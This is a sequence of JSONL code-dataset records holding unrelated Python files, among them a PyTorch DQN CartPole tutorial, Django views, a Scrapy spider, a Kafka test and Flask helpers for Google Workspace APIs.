view_width // 2):\n # 等价于[-view_width,0]\n slice_range = slice(-view_width, None)\n else:\n ##x为中心宽度为view_width\n slice_range = slice(cart_location - view_width // 2,\n cart_location + view_width // 2)\n # 水平方向裁剪,(3,160,600)->(3,160,320)\n screen = screen[:, :, slice_range]\n # Convert to float, rescare, convert to torch tensor\n # 转换为C内存连续空间变量,并归一化\n screen = np.ascontiguousarray(screen, dtype=np.float32) / 255\n # 转换为torch 的Tensor\n screen = torch.from_numpy(screen)\n # 转换为PIL Image,缩小尺寸,添加bath维度,转换为Tensor,(3,160,320)->(1,3,40,80)\n return resize(screen).unsqueeze(0).type(Tensor)\n\n\n# 重置环境\nenv.reset()\nplt.figure()\n# squeeze降维->permute换位->转换为numpy\nplt.imshow(get_screen().cpu().squeeze(0).permute(1, 2, 0).numpy(),\n interpolation='none')\nplt.title('Example extracted screen')\nplt.show()\n\n######################################################################\n# Training\n# --------\n#\n# Hyperparameters and utilities\n# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n# This cell instantiates our model and its optimizer, and defines some\n# utilities:\n#\n# - ``Variable`` - this is a simple wrapper around\n# ``torch.autograd.Variable`` that will automatically send the data to54\n# the GPU every time we construct a Variable.\n# - ``select_action`` - will select an action accordingly to an epsilon\n# greedy policy. 
Simply put, we'll sometimes use our model for choosing\n# the action, and sometimes we'll just sample one uniformly. The\n# probability of choosing a random action will start at ``EPS_START``\n# and will decay exponentially towards ``EPS_END``. ``EPS_DECAY``\n# controls the rate of the decay.\n# - ``plot_durations`` - a helper for plotting the durations of episodes,\n# along with an average over the last 100 episodes (the measure used in\n# the official evaluations). The plot will be underneath the cell\n# containing the main training loop, and will update after every\n# episode.\n#\n\nBATCH_SIZE = 128\nGAMMA = 0.999\nEPS_START = 0.9\nEPS_END = 0.05 # 随机选择的\nEPS_DECAY = 200 # 衰减终止迭代次数\n\nmodel = DQN()\n\nif use_cuda:\n model.cuda()\n\noptimizer = optim.RMSprop(model.parameters())\nmemory = ReplayMemory(10000)\nsteps_done = 0\n\n\n# 前200次eps_threshold较大,因此探索几率较多,随着不断的迭代\n# eps_threshold呈指数衰减,exp(-1)=0.368,exp(-2)=0.135,exp(-5)=0.006\n# 这意味着当steps_done=1000次时,eps_threshold=0.05+exp(-5)=0.00557,即5.57%\n# 的几率进行探索,而其他时刻都只进行开发,state.shape=(1,3,40,80),输出为shape=(1,1)的\n# action,可选值为[[0]]或者[[1]],\ndef select_action(state):\n global steps_done\n # 生成随机数\n sample = random.random()\n # 随机选择下步行为的阈值\n eps_threshold = EPS_END + (EPS_START - EPS_END) * \\\n math.exp(-1. * steps_done / EPS_DECAY)\n steps_done += 1\n # 如果随机数大于阈值(迭代次数增多),则进行开发\n if sample > eps_threshold:\n # 将当前模型输入到model,输出(1,2)的action概率,求出最大概率的index,然后转换为(1,1)的tensor\n # max(1)返回最大值的同时还返回该最大值的位置index,max(1)[1]代表列最大值所在的行的index\n return model(\n Variable(state, volatile=True).type(FloatTensor)).data.max(1)[1].view(1, 1)\n else:\n # 随机探索\n return LongTensor([[random.randrange(2)]])\n\n\n# 每轮仿真的步数,len=num_episodes\nepisode_durations = []\n\n\ndef plot_durations():\n plt.figure(1) # figure id=2,如果存在则返回,不存在则创建\n plt.clf() # 清除图像\n durations_t = torch.FloatTensor(episode_durations) # 转换为tensor,shape=num_episodes\n plt.title('Training...')\n plt.xlabel('Episode')\n plt.ylabel('Duration')\n # 绘制本轮仿真经历了多少步,步数越多算法越好\n plt.plot(durations_t.numpy())\n # 从100轮开始,开始绘制本轮前100轮的平均值(包括本轮)\n if len(durations_t) >= 100:\n # 将tensor在指定维度展开,差分步为1,shape=[(n-100)%step+1,100],然后求每行的均值\n # 例如tensor第1行表示(1,100)轮的迭代次数,第2行表示(2,101)的迭代次数\n means = durations_t.unfold(0, 100, 1).mean(1).view(-1)\n # 默认在rows方向增加,前99轮不计平均值为,默认都为0.0\n means = torch.cat((torch.zeros(99), means))\n plt.plot(means.numpy())\n plt.pause(0.001) # 暂停等待图像更新\n if is_ipython:\n display.clear_output(wait=True)\n display.display(plt.gcf())\n\n\n######################################################################\n# Training loop\n# ^^^^^^^^^^^^^\n#\n# Finally, the code for training our model.\n#\n# Here, you can find an ``optimize_model`` function that performs a\n# single step of the optimization. It first samples a batch, concatenates\n# all the tensors into a single one, computes :math:`Q(s_t, a_t)` and\n# :math:`V(s_{t+1}) = \\max_a Q(s_{t+1}, a)`, and combines them into our\n# loss. 
By defition we set :math:`V(s) = 0` if :math:`s` is a terminal\n# state.\n\n\nlast_sync = 0\n\n\n#此处loss求法有讲究\n#1.Q_a_st1=net(s_t1)\n#2.Q_a_st2=net(s_t_next),s_t_next是已经保存好的下一步的state\n#3.Q_expert=R(s_t_next)*gama+max(Q_a_st2)\n#3.loss=smooth_l1_loss(Q_a_st1,Q_expert)\ndef optimize_model():\n '''优化Qtable'''\n global last_sync\n # 如果memory中存的对象小于1个BATCH_SIZE,则退出\n if len(memory) < BATCH_SIZE:\n return\n # 从memory随机选择N个转换\n transitions = memory.sample(BATCH_SIZE)\n # Transpose the batch (see http://stackoverflow.com/a/19343/3343043 for\n # detailed explanation).\n # 将BATCH_SIZE个Transition转换为1个Transition\n # bach的每个参数都为128的元组\n batch = Transition(*zip(*transitions))\n\n # 计算当前Batch中的每个转换的下步状态部不为None的Index(1,0,1,...)\n non_final_mask = ByteTensor(tuple(map(lambda s: s is not None,\n batch.next_state)))\n\n # We don't want to backprop through the expected action values and volatile\n # will save us on temporarily changing the model parameters'\n # requires_grad to False!\n # 计算当前Batch中的每个转换的下步状态中非None的值,转换为n*1的shape的Variable\n non_final_next_states = Variable(torch.cat([s for s in batch.next_state\n if s is not None]), volatile=True)\n # 将state/action/reward转换为Variable\n state_batch = Variable(torch.cat(batch.state))\n action_batch = Variable(torch.cat(batch.action))\n reward_batch = Variable(torch.cat(batch.reward))\n\n # Compute Q(s_t, a) - the model computes Q(s_t), then we select the\n # columns of actions taken\n # 神经网络计算Q(s_t),然后根据对应的ation选取对应的概率\n state_action_values = model(state_batch).gather(1, action_batch)\n\n # Compute V(s_{t+1}) for all next states.\n\n next_state_values = Variable(torch.zeros(BATCH_SIZE).type(Tensor))\n\n # 神经网络计算Q(s_t+1),下步状态(非None)的输出的行为(0,1)的最大概率\n next_state_values[non_final_mask] = model(non_final_next_states).max(1)[0]\n # Now, we don't want to mess up the loss with a volatile flag, so let's\n # clear it. After this, we'll just end up with a Variable that has\n # requires_grad=False\n next_state_values.volatile = False\n\n # 期望的Q值,Q=Q(s',t')*GAMMA+reward\n # 等于当前(状态,行为)的reward+下步(状态,行为)的最大Q值*GAMMA\n expected_state_action_values = (next_state_values * GAMMA) + reward_batch\n\n # 计算标准差为1的Huber loss,该方法对离群点不敏感,比square loss更具备鲁棒性\n loss = F.smooth_l1_loss(state_action_values, expected_state_action_values)\n\n # Optimize the model\n optimizer.zero_grad()\n loss.backward()\n for param in model.parameters():\n # 限制参数范围上下限为(-1,1)\n param.grad.data.clamp_(-1, 1)\n optimizer.step()\n\n\n######################################################################\n#\n# Below, you can find the main training loop. At the beginning we reset\n# the environment and initialize the ``state`` variable. Then, we sample\n# an action, execute it, observe the next screen and the reward (always\n# 1), and optimize our model once. When the episode ends (our model\n# fails), we restart the loop.\n#\n# Below, `num_episodes` is set small. 
You should download\n# the notebook and run lot more epsiodes.\n\nnum_episodes = 10000\n# 仿真100轮\nfor i_episode in range(num_episodes):\n # 每轮开始先初始化仿真环境\n env.reset()\n last_screen = get_screen()\n current_screen = get_screen()\n state = current_screen - last_screen\n # 循环直至本次轮仿真结束,即done=true\n # 不用while的原因是count()可以生成迭代次数t,不用t+=1\n for t in count():\n # 选择action\n action = select_action(state)\n # env执行action,action=[[0]]或者[[1]]\n status, reward, done, _ = env.step(action[0, 0])\n x, vel_x, a, vel_a = status\n r1 = (env.x_threshold - abs(x)) / env.x_threshold - 0.8\n r2 = (env.theta_threshold_radians - abs(a)) / env.theta_threshold_radians - 0.5\n reward = r1 + r2\n # 将reward转换为tensor,shape=(1)\n reward = Tensor([reward])\n\n # 上步采集和当前采集的图像\n last_screen = current_screen\n current_screen = get_screen()\n # 如果仿真没有结束,下步的状态等于(当前状态-上步状态)\n if not done:\n next_state = current_screen - last_screen\n else:\n # 仿真结束,则下步为None\n next_state = None\n\n # 将转换存入memory\n memory.push(state, action, next_state, reward)\n\n # 移动到下一步状态\n state = next_state\n\n # 优化QTable\n optimize_model()\n # 如果本轮仿真结束,同时记录本轮仿真的最终步数\n if done:\n episode_durations.append(t + 1)\n plot_durations()\n break\n\nprint('Complete')\n# 关闭渲染\nenv.render(close=True)\nenv.close()\nplt.ioff() # 关闭交互模式\nplt.show() # 显示图片\n","sub_path":"RL/reinforcement_q_learning.py","file_name":"reinforcement_q_learning.py","file_ext":"py","file_size_in_byte":19467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"109667421","text":"from django.shortcuts import render\nfrom .forms import TeacherForm\nfrom .models import Teachers\nfrom django.http import HttpResponse\n\ndef add_teacher(request):\n if request.method == \"POST\":\n form = TeacherForm(request.POST)\n if form.is_valid():\n form.save()\n else:\n return HttpResponse(\"invalid data\",status=400)\n \n else:\n form = TeacherForm()\n return render(request, \"add_teacher.html\", {\"form\":form})\n\n\n\ndef list_teacher(request):\n teacher = Teachers.objects.all()\n return render(request, \"list_teacher.html\", {\"teacher\":teacher})\n\n\n\ndef teacher_detail(request, pk):\n teacher = Teachers.objects.get(pk=pk)\n return render(request, \"teacher_detail.html\", {\"teacher\":teacher})\n\n\n\ndef edit_teacher(request, pk):\n if request.method == \"POST\":\n form = TeacherForm(request.POST, instance = teacher)\n if form.is_valid():\n form.save()\n return redirect(\"list_teacher\")\n else:\n form = TeacherForm(instance = teachers)\n return render(request, \"edit_teacher.html\", {\"form\":form})\n \n\n\n ","sub_path":"project2/akirachix/teachers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"402718033","text":"#!/usr/bin/env python\n\"\"\"\nThis script bumps all the module references in the demo stack to\na given Git commit, then bumps the README and example instance to match.\n\nThis is meant to make it easier to keep the demo working/up-to-date with\nchanges in the storage service.\n\"\"\"\n\nimport os\nimport re\nimport subprocess\nimport sys\n\n\ndef get_file_paths_under(root=\".\"):\n \"\"\"Generates the paths to every file under ``root``.\"\"\"\n if not os.path.isdir(root):\n raise ValueError(f\"Cannot find files under non-existent directory: {root!r}\")\n\n for dirpath, _, filenames in os.walk(root):\n for f in filenames:\n if os.path.isfile(os.path.join(dirpath, f)):\n yield os.path.join(dirpath, f)\n\n\ndef 
update_commit_id(line, commit_id):\n return re.sub(\n r'source = \"github\\.com/wellcomecollection/storage-service\\.git//(?P[^\\?]+)\\?ref=[a-f0-9]+\"',\n f'source = \"github.com/wellcomecollection/storage-service.git//\\\\g?ref={commit_id}\"',\n line\n )\n\n\ndef update_file(path, commit_id):\n old_lines = list(open(path))\n new_lines = [update_commit_id(line, commit_id) for line in old_lines]\n\n if old_lines != new_lines:\n with open(path, \"w\") as outfile:\n outfile.write(\"\".join(new_lines))\n subprocess.check_call([\"git\", \"add\", path])\n\n\nif __name__ == '__main__':\n try:\n commit_id = sys.argv[1]\n except IndexError:\n sys.exit(f\"Usage: {__file__} \")\n\n for path in get_file_paths_under(\"demo_stack\"):\n if path.endswith(\".tf\"):\n update_file(path, commit_id)\n\n subprocess.check_call([\"git\", \"commit\", \"-m\", f\"Bump module references in the demo stack to {commit_id}\"])\n\n current_commit = subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"]).strip().decode(\"utf8\")[:7]\n\n for f in (\"README.md\", \"main.tf\"):\n update_file(f, current_commit)\n subprocess.check_call([\"git\", \"add\", f])\n\n subprocess.check_call([\"git\", \"commit\", \"-m\", f\"Bump module references in the demo stack README to {current_commit}\"])\n","sub_path":"demo/terraform/bump_refs.py","file_name":"bump_refs.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"445242993","text":"#This is a simple python script to track our daily time, all recorded data are stored locally\n#By Renkun Kuang, on Jan 06, 2020\n\nimport time\nimport sys\n\ndef add_a_record():\n localtime = time.localtime(time.time())\n # print (\"本地时间为 :\", localtime)\n print(localtime.tm_year)\n year = localtime.tm_year\n mon = localtime.tm_mon\n mday = localtime.tm_mday\n\n","sub_path":"funpython/pytimer/pytimer.py","file_name":"pytimer.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"264810836","text":"\"\"\"edit date model\n\nRevision ID: 84260a442183\nRevises: 261c739576cd\nCreate Date: 2017-06-01 11:11:33.665682\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '84260a442183'\ndown_revision = '261c739576cd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('dates', sa.Column('mood', sa.Text(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('dates', 'mood')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/84260a442183_edit_date_model.py","file_name":"84260a442183_edit_date_model.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"240203481","text":"import threading, logging, time\nimport asyncio\nfrom aiokafka import AIOKafkaConsumer, AIOKafkaProducer\nfrom kafka import KafkaConsumer, KafkaProducer\nimport json\n\nclass Producer():\n daemon = True\n\n def run(self):\n producer = KafkaProducer(bootstrap_servers='127.0.0.1:9092')\n\n while True:\n producer.send('greet', 'hello max')\n time.sleep(1)\n\n\n\n\nconsumer = KafkaConsumer('greet', group_id='basis', bootstrap_servers='127.0.0.1:9092')\n\nKafkaConsumer(auto_offset_reset='earliest', enable_auto_commit=False)\nKafkaConsumer(value_deserializer=lambda m: json.loads(m.decode('ascii')))\nKafkaConsumer(consumer_timeout_ms=1000)\n\ndef main():\n tasks = [Producer()]\n\n for t in tasks:\n t.run()\n\n time.sleep(10)\n\n for message in consumer:\n print(message.topic, message.key, message.value)\n\n# ========= RUN TESTS =============================================================\n\nmain()","sub_path":"app/data/cryptofeed/tests/kafka_test.py","file_name":"kafka_test.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"627633982","text":"from collections import Counter\n\nfrom django.shortcuts import render\n\ncounter_show = Counter()\ncounter_click = Counter()\n\n\ndef index(request):\n page_from = request.GET.get('from-landing', '')\n if page_from in ('original', 'test'):\n counter_click[page_from] += 1\n return render(request, 'index.html')\n\n\ndef landing(request):\n land_type = request.GET.get('ab-test-arg', 'original')\n if land_type not in ('original', 'test'):\n land_type = 'original'\n counter_show[land_type] += 1\n if land_type == 'original':\n return render(request, 'landing.html')\n elif land_type == 'test':\n return render(request, 'landing_alternate.html')\n\n\ndef stats(request):\n test_conv = 0\n orig_conv = 0\n if counter_show['test'] != 0:\n test_conv = round(counter_click['test'] / counter_show['test'], 2)\n if counter_show['original'] != 0:\n orig_conv = round(counter_click['original'] / counter_show['original'], 2)\n return render(request, 'stats.html', context={\n 'test_conversion': test_conv,\n 'original_conversion': orig_conv,\n })\n","sub_path":"request-handling/landing/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"210265543","text":"#coding:utf-8\nfrom time import sleep\n\nfrom redis import Redis\nfrom scrapy import log\nfrom scrapy_redis.spiders import RedisSpider\nfrom pad58.items import Pad58Loader\nclass Myspider(RedisSpider):\n name = 'myspider_58page'\n redis_key = 'myspider:58_urls'\n\n def __init__(self,*args,**kwargs):\n domain = kwargs.pop('domain','')\n self.allowed_domans = filter(None,domain.split(','))\n super(Myspider,self).__init__(*args,**kwargs)\n self.url = '' \\\n '://bj.58.com'\n def parse(self, response):\n el = Pad58Loader(response=response)\n PageUrl = response.xpath(\"//a[contains(@class,'next')]/@href\").extract()\n self.log(PageUrl,level=log.DEBUG)\n r = Redis()\n if PageUrl != []:\n r.lpush('myspider:58_urls',self.url+PageUrl[0])\n sleep(1)\n 
el.add_value('UrlofPage',self.url+PageUrl[0])\n urls = response.xpath('//table[contains(@class,\"tbimg\")]/tr')\n for url in urls:\n url = url.xpath(\"td[contain(@class,'t')]/a/href\").extract()\n if len(url) ==1 and 'zhuan' not in url[0]:\n r.lpush('myspider:start_urls',url[0])\n return el.load_item()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pad58/pad58/spiders/58Urlspider.py","file_name":"58Urlspider.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"513062692","text":"import inspect\nimport random\nimport unittest\n\nimport solutions\n\n\nrandom_list = [random.randint(0, 1000) for x in range(0, 100)]\n\n\nclass TestSequense(unittest.TestCase):\n def runTest(self):\n pass\n\n\nclass TestSolutions():\n def get_tests(self):\n all_functions = inspect.getmembers(solutions, inspect.isfunction)\n probs = [func for func in all_functions if func[0].startswith('p') and func[0][-2:].isdigit()]\n\n attempted = lambda source: source.split('\\n')[1].strip() != 'return None'\n\n return [(prob[0], getattr(self,\n 'test_'+prob[0],\n self.test_unimplemented),) for prob in probs if attempted(inspect.getsource(prob[1]))]\n\n @staticmethod\n def test_unimplemented(self, seq):\n pass\n\n @staticmethod\n def test_p01(seq):\n seq.assertTrue(solutions.p01(random_list) == random_list[-1], 'Returned the wrong element.')\n\n @staticmethod\n def test_p02(seq):\n seq.assertTrue(solutions.p02(random_list) == random_list[-2], 'Returned the wrong element.')\n\n @staticmethod\n def test_p03(seq):\n index = random.randint(1, len(random_list))\n seq.assertTrue(solutions.p03(random_list, index) == random_list[index-1],\n 'Did not return the correct element. 
(This problem calls the first item #1, not #0)')\n\n @staticmethod\n def test_p04(seq):\n random_len_list = [random.randint(0, 1000) for x in range(0, random.randint(1, 100))]\n seq.assertTrue(solutions.p04(random_len_list) == len(random_len_list), 'Wrong number of elements found.')\n\n @staticmethod\n def test_p05(seq):\n random_list_copy = random_list[:]\n random_list_copy.reverse()\n seq.assertTrue(solutions.p05(random_list) == random_list_copy, 'List was not reversed.')\n\n @staticmethod\n def test_p06(seq):\n random_list_copy = random_list[:]\n random_list_copy.reverse()\n\n palindrome = random_list + random_list_copy\n seq.assertTrue(solutions.p06(palindrome), 'Failed to detect palindrome.')\n palindrome.append(0)\n seq.assertFalse(solutions.p06(palindrome), 'Failed to detect non-palindrome.')\n\n\ntest_solutions = TestSolutions()\ntest_sequence = TestSequense()\n\n\ndef test_generator(name):\n def test(self):\n getattr(TestSolutions, 'test_'+name, TestSolutions.test_unimplemented)(test_sequence)\n return test\n\n\nif __name__ == '__main__':\n probs = test_solutions.get_tests()\n for p in probs:\n test_name = 'test_%s' % p[0]\n test = test_generator(p[0])\n setattr(TestSequense, test_name, test)\n unittest.main()\n","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"202831709","text":"from django.contrib.auth.models import User\r\nfrom django.http import JsonResponse\r\nfrom app.models import *\r\n\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\nfrom django.db import transaction\r\nfrom dateutil.parser import parse\r\nfrom datetime import datetime\r\n\r\ndef answered_questions_comment(request):\r\n result ={}\r\n pk = int(request.GET.get('pk' , None))\r\n pkres = int(request.GET.get('pkres' , None))\r\n chal = int(request.GET.get('chal' , None))\r\n time = str(request.GET.get('time' , None))\r\n newtime = datetime.strptime(time, '%Y%m%d%H%M%S').date()\r\n\r\n with transaction.atomic():\r\n c_chal = Challenges.objects.get(id=chal)\r\n c_ques = ChallengeQuestions.objects.get(id=pk)\r\n comex = c_ques.comment.filter(challenge = c_chal , user = c_chal.attacher , date_created__lte =newtime ).exists()\r\n\r\n if comex:\r\n com = c_ques.comment.get(challenge = c_chal , user = c_chal.attacher , date_created__lte =newtime )[0]\r\n return JsonResponse( {'respond':1 , 'direction':com.direction , 'comment':com.comment })\r\n\r\n return JsonResponse( {'respond':0})\r\n\r\n@login_required\r\ndef commentquestions(request):\r\n qid = int(request.GET.get('qid' , None))\r\n value = str(request.GET.get('value' , None))\r\n chal = int(request.GET.get('chal' , None))\r\n with transaction.atomic():\r\n c_chal = Challenges.objects.get(id=chal)\r\n c_ques = ChallengeQuestions.objects.get(id=qid)\r\n sd = timezone.now()\r\n c_com = ChallengeQuestionComments(user = request.user , comment = value , challenge = c_chal , direction = find_direction(value) )\r\n c_com.save()\r\n c_ques.comment.add(c_com)\r\n\r\n\r\n\r\n\r\n return JsonResponse( {'answer':1 , 'direction':find_direction(value) , 'usr':request.user.first_name +' '+request.user.last_name , 'usrid':request.user.id})\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef answeredquestions(request):\r\n pk = int(request.GET.get('pk' , None))\r\n pkres = int(request.GET.get('pkres' , None))\r\n answer = str(request.GET.get('answer' , None))\r\n chal = 
int(request.GET.get('chal' , None))\r\n time = int(request.GET.get('time' , None))\r\n\r\n challenge = Challenges.objects.get(id = chal)\r\n question = ChallengeQuestions.objects.get(id = pk)\r\n\r\n challenge_res = ChallengesResult.objects.get(id = pkres)\r\n\r\n if challenge_res.number == 10:\r\n challenge_res.active = 0\r\n challenge.status = 2\r\n challenge.save()\r\n\r\n\r\n if question.curect_answer == answer:\r\n challenge_res.status = 1\r\n challenge_res.seconds = time\r\n challenge_res.user_answer = answer\r\n challenge_res.save()\r\n else:\r\n challenge_res.status = 2\r\n challenge_res.seconds = time\r\n challenge_res.user_answer = answer\r\n challenge_res.save()\r\n return JsonResponse( {'answer':question.curect_answer})\r\n\r\n return JsonResponse( {'answer':question.curect_answer})\r\n\r\n\r\n\r\n\r\ndef challenge_new(request):\r\n pk = int(request.GET.get('pk' , None))\r\n user = ChallengeUser.objects.get(id = pk)\r\n exist = Challenges.objects.filter(attacher = request.user , defender = user.user , status__lt = 2).exists()\r\n\r\n if not exist:\r\n new_challenge = Challenges(attacher = request.user , defender = user.user , status = 0)\r\n new_challenge.save()\r\n notify.send(sender=request.user , actor=request.user , verb=\"Challenge You\" , action_object=new_challenge ,target = new_challenge , recipient=new_challenge.defender, description='Do You Think Your Talented ?' , level='warning' )\r\n\r\n return JsonResponse( {'error_msg':True})\r\n return JsonResponse( {'error_msg':False})\r\n\r\n\r\ndef challenge_pindding(request):\r\n pk = int(request.GET.get('pk' , None))\r\n action = int(request.GET.get('action' , None))\r\n try:\r\n challenge = Challenges.objects.get(defender = request.user , id = pk , status = 0)\r\n challenge.status = action\r\n challenge.save()\r\n\r\n notify.send(sender=request.user , actor=request.user , verb=\"Accepted You Challenge\" , action_object=challenge ,target = challenge , recipient=new_challenge.attacher, description='Click Here To See It Online !' 
, level='warning' )\r\n\r\n return JsonResponse( {'error_msg':True})\r\n except Challenges.DoesNotExist:\r\n return JsonResponse( {'error_msg':False})\r\n\r\n\r\n return JsonResponse( {'error_msg':False})\r\n","sub_path":"app/api_group_single.py","file_name":"api_group_single.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"651821279","text":"import logging\nfrom collections import OrderedDict, namedtuple\nfrom datetime import date, datetime, timezone, timedelta\n\nimport numpy as np\nimport pandas as pd\nfrom flask import current_app\nfrom google.oauth2 import service_account\nfrom googleapiclient.discovery import build\n\nfrom .helpers import parse_timestamp_str\nfrom .drive import file_tree_to_df\nfrom .models import User\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_service_handles():\n \"\"\"Get dictionary of {service_name: service_handle}.\"\"\"\n SERVICE_ACCOUNT_FILE = current_app.config['SERVICE_ACCOUNT_FILE']\n # GROUP_KEY = current_app.config['GROUP_KEY']\n SCOPES = current_app.config['SCOPES']\n\n credentials = service_account.Credentials.from_service_account_file(\n SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n delegated_credentials = credentials.with_subject(\n current_app.config['CREDENTIALS_AS_USER'])\n\n dir_service = build('admin', 'directory_v1', credentials=delegated_credentials, cache_discovery=False)\n files_service = build('drive', 'v3', credentials=delegated_credentials, cache_discovery=False)\n cal_service = build('calendar', 'v3', credentials=delegated_credentials, cache_discovery=False)\n return {\n 'dir': dir_service,\n 'files': files_service,\n 'cal': cal_service\n }\n\n\nSERVICE_HANDLES = get_service_handles()\n\n\ndef get_members_dict():\n \"\"\"Get dictionary of {google_id: email_address}.\n\n Return:\n members_dict (dict): google ID: email dictionary.\n \"\"\"\n service = SERVICE_HANDLES['dir']\n\n # GOOGLE GROUP MEMBERS\n group_key = current_app.config['GROUP_KEY']\n logging.info(\"Looking up group members list.\")\n res = service.members().list(groupKey=group_key).execute()\n members_dict = {i['id']: i['email'] for i in res['members'] if 'email' in i}\n\n # DOMAIN-ONLY MEMBERS\n domain_users = get_domain_users()\n domain_dict = {u.id: u.email for u in domain_users}\n members_dict.update(domain_dict)\n\n return members_dict\n\n\ndef get_domain_users():\n \"\"\"Get list of domain users (who might not be in specified Google Group).\n\n Warning: will only fetch up to 100 users.\n \"\"\"\n users = []\n service = SERVICE_HANDLES['dir']\n logger.info(\"Looking up domain-specific users.\")\n res = service.users().list(customer='my_customer').execute()\n User = namedtuple('User', ['id', 'email', 'full_name'])\n for user in res['users']:\n user_id = user['id']\n full_name = user['name']['fullName']\n email = user['primaryEmail']\n users.append(User(user_id, email, full_name))\n return users\n\n\ndef find_user_by_email(find_email):\n user = None\n for u in User.query.all():\n if find_email in u.known_emails:\n user = u\n break\n return user\n\n\nclass ApiTable:\n cols_show = None # subclasses will override\n cols_other = None\n\n def __init__(self):\n self._df = None # subclasses will override\n self.last_refresh = datetime.utcnow()\n self.refresh_minutes = 1\n self.refresh_df()\n\n def refresh_df(self):\n \"\"\"Subclasses will override this method.\"\"\"\n pass\n\n @property\n def cols(self):\n return list(self.cols_show) + list(self.cols_other)\n\n @property\n def 
df(self):\n if datetime.utcnow() > (self.last_refresh + timedelta(minutes=self.refresh_minutes)):\n self.refresh_df()\n self.last_refresh = datetime.utcnow()\n return self._df\n\n @staticmethod\n def _get_utc_naive(dt):\n \"\"\"Convert timezone aware timestamp to UTC naive timestamp.\"\"\"\n return dt.astimezone(timezone.utc).replace(tzinfo=None)\n\n\nclass StatusTable(ApiTable):\n\n cols_show = OrderedDict([\n ('status', 'Status'),\n ('n_requests', 'Requests'),\n ])\n cols_other = []\n\n def __init__(self, engine):\n self.engine = engine\n super().__init__()\n\n def refresh_df(self):\n \"\"\"Return status table. Example below.\n status n_requests\n 0 Unassigned 2\n 1 Processing 0\n 2 Shipped 0\n 3 Received 1\n 4 Problem 0\n 5 Cancelled 0\n \"\"\"\n\n status_dict = OrderedDict([\n ('unassigned', 'Unassigned'),\n ('processing', 'Processing'),\n ('shipped', 'Shipped'),\n ('received', 'Received'),\n ('problem', 'Problem'),\n ('cancelled', 'Cancelled')])\n\n statuses = pd.read_sql(\"select status, count(*) as n_requests from strains.requests group by status;\",\n self.engine)\n statuses.status = statuses.status.apply(lambda v: status_dict[v])\n statuses = statuses.set_index('status').reindex(status_dict.values())\n statuses = statuses['n_requests'].apply(lambda v: 0 if np.isnan(v) else int(v)).reset_index()\n self._df = statuses\n\n\nclass Calendar(ApiTable):\n cols_show = OrderedDict([\n ('title', 'Item'),\n ('start', 'When'),\n ('location', 'Where')])\n cols_other = ['description', 'url', 'end']\n show_n = 5\n\n def refresh_df(self):\n service = SERVICE_HANDLES['cal']\n collection = service.events()\n cmd = collection.list(calendarId=current_app.config['CALENDAR_ID'],\n orderBy='startTime',\n singleEvents=True)\n res = cmd.execute()\n\n cal = pd.DataFrame.from_records(res['items'])\n cal.rename(columns={'htmlLink': 'url', 'summary': 'title'}, inplace=True)\n cal = cal[self.cols].copy()\n cal['location'] = cal['location'].apply(lambda v: '' if type(v) != str else v)\n cal['start'] = cal['start'].apply(Calendar.parse_datetime)\n cal['end'] = cal['end'].apply(Calendar.parse_datetime)\n cal['in_past'] = cal['end'].apply(Calendar.in_past)\n cal['description'] = cal['description'].apply(\n lambda v: v.strip() if type(v) is str else '')\n cal = cal.query('~in_past').head(self.show_n)\n self._df = cal\n\n @staticmethod\n def parse_datetime(start_dict):\n \"\"\"Get naive datetime in UTC or date for dates.\"\"\"\n if 'dateTime' in start_dict:\n return parse_timestamp_str(start_dict['dateTime'])\n if 'date' in start_dict:\n return datetime.strptime(start_dict['date'], '%Y-%m-%d').date()\n\n @staticmethod\n def parse_time(time):\n \"\"\"Return naive datetime in UTC.\"\"\"\n if pd.isnull(time):\n return np.nan\n stripped = time[:-3] + time[-2:] # remove colon in UTC offset\n dt = datetime.strptime(stripped, '%Y-%m-%dT%H:%M:%S%z')\n return ApiTable._get_utc_naive(dt)\n\n @staticmethod\n def in_past(t):\n \"\"\"Get 'in past' status (True or False) for date or time.\n\n Args:\n t: timezone aware or naive timestamps, or date\n \"\"\"\n now_naive = datetime.now()\n now = now_naive if t.tzinfo is None else 